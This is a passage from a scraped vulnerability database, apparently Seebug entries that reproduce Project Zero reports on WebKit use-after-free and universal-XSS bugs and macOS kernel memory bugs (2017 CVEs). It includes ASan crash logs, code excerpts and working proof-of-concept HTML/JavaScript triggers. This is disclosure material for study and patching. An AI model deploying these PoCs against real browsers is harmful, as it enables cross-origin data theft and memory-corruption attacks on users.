WTF::PassRefPtr<WebCore::FormState>, WebCore::AllowNavigationToInvalidURL)::$_4&&&, WebCore::ResourceRequest const&&&, WTF::PassRefPtr<WebCore::FormState>&&, bool&&) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xaa0301)\r\n #15 0x1170fd592 in std::__1::function<void (WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, bool)>::operator()(WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, bool) const (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1fa1592)\r\n #16 0x1170fd300 in WebCore::PolicyCallback::call(bool) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1fa1300)\r\n #17 0x1170ff0aa in WebCore::PolicyChecker::continueAfterNavigationPolicy(WebCore::PolicyAction) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1fa30aa)\r\n #18 0x107df7b2e in std::__1::function<void 
(WebCore::PolicyAction)>::operator()(WebCore::PolicyAction) const (webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x60fb2e)\r\n #19 0x107df7986 in WebKit::WebFrame::didReceivePolicyDecision(unsigned long long, WebCore::PolicyAction, unsigned long long, WebKit::DownloadID) (webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x60f986)\r\n #20 0x107e07dbc in WebKit::WebFrameLoaderClient::dispatchDecidePolicyForNavigationAction(WebCore::NavigationAction const&, WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, std::__1::function<void (WebCore::PolicyAction)>) (webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x61fdbc)\r\n #21 0x1170fea08 in WebCore::PolicyChecker::checkNavigationPolicy(WebCore::ResourceRequest const&, bool, WebCore::DocumentLoader*, WTF::PassRefPtr<WebCore::FormState>, std::__1::function<void (WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, bool)>) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1fa2a08)\r\n #22 0x115be72b3 in WebCore::FrameLoader::loadWithDocumentLoader(WebCore::DocumentLoader*, WebCore::FrameLoadType, WTF::PassRefPtr<WebCore::FormState>, WebCore::AllowNavigationToInvalidURL) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa8b2b3)\r\n #23 0x115be5de6 in WebCore::FrameLoader::loadWithNavigationAction(WebCore::ResourceRequest const&, WebCore::NavigationAction const&, WebCore::LockHistory, WebCore::FrameLoadType, WTF::PassRefPtr<WebCore::FormState>, WebCore::AllowNavigationToInvalidURL) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa89de6)\r\n #24 0x115be2113 in WebCore::FrameLoader::loadURL(WebCore::FrameLoadRequest const&, WTF::String const&, WebCore::FrameLoadType, WebCore::Event*, WTF::PassRefPtr<WebCore::FormState>) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa86113)\r\n #25 0x115bdb1c4 in WebCore::FrameLoader::loadFrameRequest(WebCore::FrameLoadRequest const&, 
WebCore::Event*, WTF::PassRefPtr<WebCore::FormState>) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa7f1c4)\r\n #26 0x115bda68e in WebCore::FrameLoader::urlSelected(WebCore::FrameLoadRequest const&, WebCore::Event*) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa7e68e)\r\n #27 0x116fdaa98 in WebCore::ScheduledLocationChange::fire(WebCore::Frame&) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1e7ea98)\r\n #28 0x116fd732f in WebCore::NavigationScheduler::timerFired() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1e7b32f)\r\n #29 0x117b92cd1 in WebCore::ThreadTimers::sharedTimerFiredInternal() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x2a36cd1)\r\n\r\npreviously allocated by thread T0 here:\r\n #0 0x10a087bf0 in wrap_malloc (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.0.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib+0x4abf0)\r\n #1 0x10d0d901e in bmalloc::Allocator::allocateSlowCase(unsigned long) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x18c601e)\r\n #2 0x10d074535 in bmalloc::Allocator::allocate(unsigned long) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x1861535)\r\n #3 0x115c14a59 in WebCore::FrameView::create(WebCore::Frame&) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xab8a59)\r\n #4 0x115bd459c in WebCore::Frame::createView(WebCore::IntSize const&, WebCore::Color const&, bool, WebCore::IntSize const&, WebCore::IntRect const&, bool, WebCore::ScrollbarMode, bool, WebCore::ScrollbarMode, bool) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa7859c)\r\n #5 0x107e0df0b in WebKit::WebFrameLoaderClient::transitionToCommittedForNewPage() (webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x625f0b)\r\n #6 0x115beb6cf in WebCore::FrameLoader::transitionToCommitted(WebCore::CachedPage*) 
(webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa8f6cf)\r\n #7 0x115bea77b in WebCore::FrameLoader::commitProvisionalLoad() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa8e77b)\r\n #8 0x1158e6197 in WebCore::DocumentLoader::finishedLoading(double) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x78a197)\r\n #9 0x1158ee2e5 in WebCore::DocumentLoader::maybeLoadEmpty() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x7922e5)\r\n #10 0x1158ee6d3 in WebCore::DocumentLoader::startLoadingMainResource() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x7926d3)\r\n #11 0x115beec01 in WebCore::FrameLoader::continueLoadAfterWillSubmitForm() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa92c01)\r\n #12 0x115be8495 in WebCore::FrameLoader::continueLoadAfterNavigationPolicy(WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, bool, WebCore::AllowNavigationToInvalidURL) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa8c495)\r\n #13 0x115bfc4ba in WebCore::FrameLoader::loadWithDocumentLoader(WebCore::DocumentLoader*, WebCore::FrameLoadType, WTF::PassRefPtr<WebCore::FormState>, WebCore::AllowNavigationToInvalidURL)::$_4::operator()(WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, bool) const (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xaa04ba)\r\n #14 0x115bfc301 in void std::__1::__invoke_void_return_wrapper<void>::__call<WebCore::FrameLoader::loadWithDocumentLoader(WebCore::DocumentLoader*, WebCore::FrameLoadType, WTF::PassRefPtr<WebCore::FormState>, WebCore::AllowNavigationToInvalidURL)::$_4&, WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, bool>(WebCore::FrameLoader::loadWithDocumentLoader(WebCore::DocumentLoader*, WebCore::FrameLoadType, WTF::PassRefPtr<WebCore::FormState>, WebCore::AllowNavigationToInvalidURL)::$_4&&&, WebCore::ResourceRequest const&&&, 
WTF::PassRefPtr<WebCore::FormState>&&, bool&&) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xaa0301)\r\n #15 0x1170fd592 in std::__1::function<void (WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, bool)>::operator()(WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, bool) const (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1fa1592)\r\n #16 0x1170fd300 in WebCore::PolicyCallback::call(bool) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1fa1300)\r\n #17 0x1170ff0aa in WebCore::PolicyChecker::continueAfterNavigationPolicy(WebCore::PolicyAction) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1fa30aa)\r\n #18 0x107df7b2e in std::__1::function<void (WebCore::PolicyAction)>::operator()(WebCore::PolicyAction) const (webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x60fb2e)\r\n #19 0x107df7986 in WebKit::WebFrame::didReceivePolicyDecision(unsigned long long, WebCore::PolicyAction, unsigned long long, WebKit::DownloadID) (webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x60f986)\r\n #20 0x107e07dbc in WebKit::WebFrameLoaderClient::dispatchDecidePolicyForNavigationAction(WebCore::NavigationAction const&, WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, std::__1::function<void (WebCore::PolicyAction)>) (webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x61fdbc)\r\n #21 0x1170fea08 in WebCore::PolicyChecker::checkNavigationPolicy(WebCore::ResourceRequest const&, bool, WebCore::DocumentLoader*, WTF::PassRefPtr<WebCore::FormState>, std::__1::function<void (WebCore::ResourceRequest const&, WTF::PassRefPtr<WebCore::FormState>, bool)>) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1fa2a08)\r\n #22 0x115be72b3 in WebCore::FrameLoader::loadWithDocumentLoader(WebCore::DocumentLoader*, WebCore::FrameLoadType, WTF::PassRefPtr<WebCore::FormState>, WebCore::AllowNavigationToInvalidURL) 
(webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa8b2b3)\r\n #23 0x115be5de6 in WebCore::FrameLoader::loadWithNavigationAction(WebCore::ResourceRequest const&, WebCore::NavigationAction const&, WebCore::LockHistory, WebCore::FrameLoadType, WTF::PassRefPtr<WebCore::FormState>, WebCore::AllowNavigationToInvalidURL) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa89de6)\r\n #24 0x115be2113 in WebCore::FrameLoader::loadURL(WebCore::FrameLoadRequest const&, WTF::String const&, WebCore::FrameLoadType, WebCore::Event*, WTF::PassRefPtr<WebCore::FormState>) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa86113)\r\n #25 0x115be043c in WebCore::FrameLoader::loadURLIntoChildFrame(WebCore::URL const&, WTF::String const&, WebCore::Frame*) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa8443c)\r\n #26 0x107e0ed25 in WebKit::WebFrameLoaderClient::createFrame(WebCore::URL const&, WTF::String const&, WebCore::HTMLFrameOwnerElement*, WTF::String const&, bool, int, int) (webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x626d25)\r\n #27 0x117966328 in WebCore::SubframeLoader::loadSubframe(WebCore::HTMLFrameOwnerElement&, WebCore::URL const&, WTF::String const&, WTF::String const&) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x280a328)\r\n #28 0x117964335 in WebCore::SubframeLoader::loadOrRedirectSubframe(WebCore::HTMLFrameOwnerElement&, WebCore::URL const&, WTF::AtomicString const&, WebCore::LockHistory, WebCore::LockBackForwardList) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x2808335)\r\n #29 0x117963f47 in WebCore::SubframeLoader::requestFrame(WebCore::HTMLFrameOwnerElement&, WTF::String const&, WTF::AtomicString const&, WebCore::LockHistory, WebCore::LockBackForwardList) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x2807f47)\r\n\r\nSUMMARY: AddressSanitizer: heap-use-after-free 
(webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x7788a) in WTF::TypeCastTraits<WebCore::FrameView const, WebCore::ScrollView const, false>::isType(WebCore::Widget const&)\r\nShadow bytes around the buggy address:\r\n 0x1c3400018b00: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd\r\n 0x1c3400018b10: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd\r\n 0x1c3400018b20: fd fd fd fd fd fd fd fd fd fd fa fa fa fa fa fa\r\n 0x1c3400018b30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x1c3400018b40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n=>0x1c3400018b50:[fd]fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd\r\n 0x1c3400018b60: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd\r\n 0x1c3400018b70: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd\r\n 0x1c3400018b80: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd\r\n 0x1c3400018b90: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd\r\n 0x1c3400018ba0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd\r\nShadow byte legend (one shadow byte represents 8 application bytes):\r\n Addressable: 00\r\n Partially addressable: 01 02 03 04 05 06 07 \r\n Heap left redzone: fa\r\n Heap right redzone: fb\r\n Freed heap region: fd\r\n Stack left redzone: f1\r\n Stack mid redzone: f2\r\n Stack right redzone: f3\r\n Stack partial redzone: f4\r\n Stack after return: f5\r\n Stack use after scope: f8\r\n Global redzone: f9\r\n Global init order: f6\r\n Poisoned by user: f7\r\n Container overflow: fc\r\n Array cookie: ac\r\n Intra object redzone: bb\r\n ASan internal: fe\r\n Left alloca redzone: ca\r\n Right alloca redzone: cb\r\n==54938==ABORTING\r\n```", "cvss3": {}, "published": "2017-04-07T00:00:00", "type": "seebug", "title": "WebKit: Use-After-Free via Document::adoptNode (CVE-2017-2468)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-2468"], "modified": "2017-04-07T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-92920", "id": "SSV:92920", "sourceData": "\n <body>\r\n<script>\r\n\r\nvar s = 
document.body.appendChild(document.createElement('script'));\r\ns.type = '0';\r\ns.textContent = 'document.body.appendChild(parent.i0)';\r\n\r\nvar i0 = s.appendChild(document.createElement('iframe'));\r\ns.type = '';\r\n\r\nvar f = document.body.appendChild(document.createElement('iframe'));\r\nf.contentDocument.adoptNode(i0);\r\nf.src = 'about:blank';\r\n\r\n</script>\r\n</body>\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-92920", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-11-19T12:00:00", "description": "Here's a snippet of the method SubframeLoader::requestFrame which is invoked when the |src| of an iframe object is changed.\r\n```\r\nbool SubframeLoader::requestFrame(HTMLFrameOwnerElement& ownerElement, const String& urlString, const AtomicString& frameName, LockHistory lockHistory, LockBackForwardList lockBackForwardList)\r\n{\r\n // Support for <frame src=\"javascript:string\">\r\n URL scriptURL;\r\n URL url;\r\n if (protocolIsJavaScript(urlString)) {\r\n scriptURL = completeURL(urlString); // completeURL() encodes the URL.\r\n url = blankURL();\r\n } else\r\n url = completeURL(urlString);\r\n\r\n if (shouldConvertInvalidURLsToBlank() && !url.isValid())\r\n url = blankURL();\r\n\r\n Frame* frame = loadOrRedirectSubframe(ownerElement, url, frameName, lockHistory, lockBackForwardList); <<------- in here, the synchronous page load is made.\r\n if (!frame)\r\n return false;\r\n\r\n if (!scriptURL.isEmpty())\r\n frame->script().executeIfJavaScriptURL(scriptURL); <<----- boooom\r\n\r\n return true;\r\n}\r\n```\r\n\r\nA SOP violation check is made before the above method is called. But the frame's document can be changed before |frame->script().executeIfJavaScriptURL| is called. 
This can happen by calling |showModalDialog| that enters a message loop that may start pending page loads.\r\n\r\nTested on Safari 10.0.3(12602.4.8).\r\n\r\nPoC:\r\n```\r\n<body>\r\n<p>click anywhere</p>\r\n<script>\r\n\r\nwindow.onclick = () => {\r\n window.onclick = null;\r\n\r\n f = document.createElement('iframe');\r\n f.src = 'javascript:alert(location)';\r\n f.onload = () => {\r\n f.onload = null;\r\n\r\n let a = f.contentDocument.createElement('a');\r\n a.href = 'https://abc.xyz/';\r\n a.click();\r\n\r\n window.showModalDialog(URL.createObjectURL(new Blob([`\r\n<script>\r\nlet it = setInterval(() => {\r\n try {\r\n opener[0].document.x;\r\n } catch (e) {\r\n clearInterval(it);\r\n\r\n window.close();\r\n }\r\n}, 100);\r\n</scrip` + 't>'], {type: 'text/html'})));\r\n };\r\n\r\n document.body.appendChild(f);\r\n};\r\n\r\ncached.src = kUrl;\r\n\r\n</script>\r\n</body>\r\n```", "cvss3": {}, "published": "2017-04-07T00:00:00", "type": "seebug", "title": "WebKit: UXSS via a synchronous page load\uff08CVE-2017-2480\uff09", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-2480"], "modified": "2017-04-07T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-92923", "id": "SSV:92923", "sourceData": "\n <body>\r\n<p>click anywhere</p>\r\n<script>\r\n\r\nwindow.onclick = () => {\r\n window.onclick = null;\r\n\r\n f = document.createElement('iframe');\r\n f.src = 'javascript:alert(location)';\r\n f.onload = () => {\r\n f.onload = null;\r\n\r\n let a = f.contentDocument.createElement('a');\r\n a.href = 'https://abc.xyz/';\r\n a.click();\r\n\r\n window.showModalDialog(URL.createObjectURL(new Blob([`\r\n<script>\r\nlet it = setInterval(() => {\r\n try {\r\n opener[0].document.x;\r\n } catch (e) {\r\n clearInterval(it);\r\n\r\n window.close();\r\n }\r\n}, 100);\r\n</scrip` + 't>'], {type: 'text/html'})));\r\n };\r\n\r\n document.body.appendChild(f);\r\n};\r\n\r\ncached.src = kUrl;\r\n\r\n</script>\r\n</body>\n ", "sourceHref": 
"https://www.seebug.org/vuldb/ssvid-92923", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-11-19T12:00:18", "description": "fseventsf_ioctl handles ioctls on fsevent fds acquired via FSEVENTS_CLONE_64 on /dev/fsevents\n\nHere's the code for the FSEVENTS_DEVICE_FILTER_64 ioctl:\n\n```\n case FSEVENTS_DEVICE_FILTER_64:\n if (!proc_is64bit(vfs_context_proc(ctx))) {\n ret = EINVAL;\n break;\n }\n devfilt_args = (fsevent_dev_filter_args64 *)data;\n \n handle_dev_filter:\n {\n int new_num_devices;\n dev_t *devices_not_to_watch, *tmp=NULL;\n \n if (devfilt_args->num_devices > 256) {\n ret = EINVAL;\n break;\n }\n \n new_num_devices = devfilt_args->num_devices;\n if (new_num_devices == 0) {\n tmp = fseh->watcher->devices_not_to_watch; <------ (a)\n \n lock_watch_table(); <------ (b)\n fseh->watcher->devices_not_to_watch = NULL;\n fseh->watcher->num_devices = new_num_devices;\n unlock_watch_table(); <------ (c)\n \n if (tmp) {\n FREE(tmp, M_TEMP); <------ (d)\n }\n break;\n }\n```\n\nThere's nothing stopping two threads seeing the same value for devices_not_to_watch at (a), assigning that to tmp then freeing it at (d). The lock/unlock at (b) and (c) don't protect this.\n\nThis leads to a double free, which if you also race allocations from the same zone can lead to an exploitable kernel use after free.\n\n/dev/fsevents is:\n`crw-r--r-- 1 root wheel 13, 0 Feb 15 14:00 /dev/fsevents`\n\nso this is a privesc from either root or members of the wheel group to the kernel\n\ntested on MacOS 10.12.3 (16D32) on MacbookAir5,2\n\n(build with -O3)\n\nAttachment:
[fsevents_race.c](<https://bugs.chromium.org/p/project-zero/issues/attachment?aid=271278>)\n", "cvss3": {}, "published": "2017-04-04T00:00:00", "type": "seebug", "title": "MacOS/iOS kernel double free due to bad locking in fsevents device\uff08CVE-2017-2490\uff09", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-2490"], "modified": "2017-04-04T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-92884", "id": "SSV:92884", "sourceData": "", "sourceHref": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T12:00:17", "description": "The bpf ioctl BIOCSBLEN allows userspace to set the bpf buffer length:\n\n```\n case BIOCSBLEN: /* u_int */\n if (d->bd_bif != 0)\n error = EINVAL;\n else {\n u_int size;\n \n bcopy(addr, &size, sizeof (size));\n \n if (size > bpf_maxbufsize)\n size = bpf_maxbufsize;\n else if (size < BPF_MINBUFSIZE)\n size = BPF_MINBUFSIZE;\n bcopy(&size, addr, sizeof (size));\n d->bd_bufsize = size;\n }\n break;\n```\n\nd->bd_bif is set to the currently attached interface, so we can't change the length if we're already attached to an interface.\n\nThere's no ioctl command to detach us from an interface, but we can just destroy the interface (by for example attaching to a bridge interface.) We can then call BIOCSBLEN again with a larger length which will set d->bd_bufsize to a new, larger value.\n\nIf we then attach to an interface again we hit this code in bpf_setif:\n\n`if (d->bd_sbuf == 0) { error = bpf_allocbufs(d); if (error != 0) return (error);`\n\nThis means that the buffers actually won't be reallocated since d->bd_sbuf will still point to the old buffer. This means that d->bd_bufsize is out of sync with the actual allocated buffer size leading to heap corruption when packets are received on the target interface.\n\nThis PoC sets a small buffer length then creates and attaches to a bridge interface. 
It then destroys the bridge interface (which causes bpfdetach to be called on that interface, clearing d->bd_bif for our bpf device.)\n\nWe then set a large buffer size and attach to the loopback interface and send some large ping packets.\n\nThis bug is a root -> kernel priv esc\n\ntested on MacOS 10.12.3 (16D32) on MacbookAir5,2\n\nAnnex: [bpf.c](<https://bugs.chromium.org/p/project-zero/issues/attachment?aid=270838>)\n", "cvss3": {}, "published": "2017-04-04T00:00:00", "type": "seebug", "title": "MacOS/iOS kernel heap overflow in bpf (CVE-2017-2482)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-2482"], "modified": "2017-04-04T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-92888", "id": "SSV:92888", "sourceData": "", "sourceHref": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T12:00:20", "description": "The frame is not detached from an unloaded window. We can access the new document's named properties via the following function.\r\n\r\n```\r\nstatic bool jsDOMWindowPropertiesGetOwnPropertySlotNamedItemGetter(JSDOMWindowProperties* thisObject, Frame& frame, ExecState* exec, PropertyName propertyName, PropertySlot& slot)\r\n{\r\n ...\r\n Document* document = frame.document(); <<-------- the new document.\r\n if (is<HTMLDocument>(*document)) {\r\n auto& htmlDocument = downcast<HTMLDocument>(*document);\r\n auto* atomicPropertyName = propertyName.publicName();\r\n if (atomicPropertyName && htmlDocument.hasWindowNamedItem(*atomicPropertyName)) {\r\n JSValue namedItem;\r\n if (UNLIKELY(htmlDocument.windowNamedItemContainsMultipleElements(*atomicPropertyName))) {\r\n Ref<HTMLCollection> collection = document->windowNamedItems(atomicPropertyName);\r\n ASSERT(collection->length() > 1);\r\n namedItem = toJS(exec, thisObject->globalObject(), collection);\r\n } else\r\n namedItem = toJS(exec, thisObject->globalObject(), 
htmlDocument.windowNamedItem(*atomicPropertyName));\r\n slot.setValue(thisObject, ReadOnly | DontDelete | DontEnum, namedItem);\r\n return true;\r\n }\r\n }\r\n\r\n return false;\r\n}\r\n```\r\n\r\nPoC:\r\n```\r\n\"use strict\";\r\n\r\nlet f = document.body.appendChild(document.createElement(\"iframe\"));\r\nlet get_element = f.contentWindow.Function(\"return logo;\");\r\n\r\nf.onload = () => {\r\n f.onload = null;\r\n\r\n let node = get_element();\r\n\r\n var sc = document.createElement(\"script\");\r\n sc.innerText = \"alert(location)\";\r\n node.appendChild(sc);\r\n};\r\n\r\nf.src = \"https://abc.xyz/\";\r\n```\r\nTested on Safari 10.0.2(12602.3.12.0.1).", "cvss3": {}, "published": "2017-04-04T00:00:00", "type": "seebug", "title": "Apple Webkit: UXSS by accessing a named property from an unloaded window (CVE-2017-2367)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-2367"], "modified": "2017-04-04T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-92881", "id": "SSV:92881", "sourceData": "", "sourceHref": "", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-11-19T12:00:09", "description": "There is a use-after-free security vulnerability related to how the HTMLInputElement is handled in WebKit. The vulnerability was confirmed on a nightly build of WebKit. 
The PoC also crashes Safari 10.0.2 on Mac.\r\n\r\nPoC:\r\n\r\n```\r\n\r\n<script>\r\nfunction eventhandler1() {\r\n input.type = \"foo\";\r\n}\r\nfunction eventhandler2() {\r\n input.selectionStart = 25;\r\n}\r\n</script>\r\n<input id=\"input\" onfocus=\"eventhandler1()\" autofocus=\"autofocus\" type=\"tel\">\r\n<iframe onload=\"eventhandler2()\"></iframe>\r\n\r\n```\r\n\r\nASAN log (from WebKit nightly on Mac): \r\n\r\n```\r\n==26782==ERROR: AddressSanitizer: heap-use-after-free on address 0x60800005a3b4 at pc 0x000108e904ad bp 0x7fff5e5fa940 sp 0x7fff5e5fa938\r\nREAD of size 4 at 0x60800005a3b4 thread T0\r\n #0 0x108e904ac in WebCore::Node::getFlag(WebCore::Node::NodeFlags) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x84ac)\r\n #1 0x108e93568 in WebCore::Node::renderer() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xb568)\r\n #2 0x10ad2213a in WebCore::Node::renderBox() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1e9a13a)\r\n #3 0x109b9e2eb in WebCore::HTMLTextFormControlElement::setSelectionRange(int, int, WebCore::TextFieldSelectionDirection, WebCore::AXTextStateChangeIntent const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xd162eb)\r\n #4 0x109b9db6a in WebCore::HTMLTextFormControlElement::setSelectionStart(int) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xd15b6a)\r\n #5 0x109afa97f in WebCore::HTMLInputElement::setSelectionStartForBindings(int) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc7297f)\r\n #6 0x10a37a857 in WebCore::setJSHTMLInputElementSelectionStartFunction(JSC::ExecState&, WebCore::JSHTMLInputElement&, JSC::JSValue, JSC::ThrowScope&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x14f2857)\r\n #7 
0x10a3718af in bool WebCore::BindingCaller<WebCore::JSHTMLInputElement>::setAttribute<&(WebCore::setJSHTMLInputElementSelectionStartFunction(JSC::ExecState&, WebCore::JSHTMLInputElement&, JSC::JSValue, JSC::ThrowScope&)), (WebCore::CastedThisErrorBehavior)0>(JSC::ExecState*, long long, long long, char const*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x14e98af)\r\n #8 0x105a0ab58 in JSC::callCustomSetter(JSC::ExecState*, bool (*)(JSC::ExecState*, long long, long long), bool, JSC::JSValue, JSC::JSValue) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x70eb58)\r\n #9 0x105a0ac85 in JSC::callCustomSetter(JSC::ExecState*, JSC::JSValue, bool, JSC::JSObject*, JSC::JSValue, JSC::JSValue) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x70ec85)\r\n #10 0x1063edf95 in JSC::JSObject::putInlineSlow(JSC::ExecState*, JSC::PropertyName, JSC::JSValue, JSC::PutPropertySlot&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x10f1f95)\r\n #11 0x1065a2223 in llint_slow_path_put_by_id (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12a6223)\r\n #12 0x1065bdbfd in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12c1bfd)\r\n #13 0x1065c126c in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12c526c)\r\n #14 0x1065ba83a in vmEntryToJavaScript (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12be83a)\r\n #15 0x10627947d in JSC::JITCode::execute(JSC::VM*, JSC::ProtoCallFrame*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0xf7d47d)\r\n #16 0x106203aa3 in 
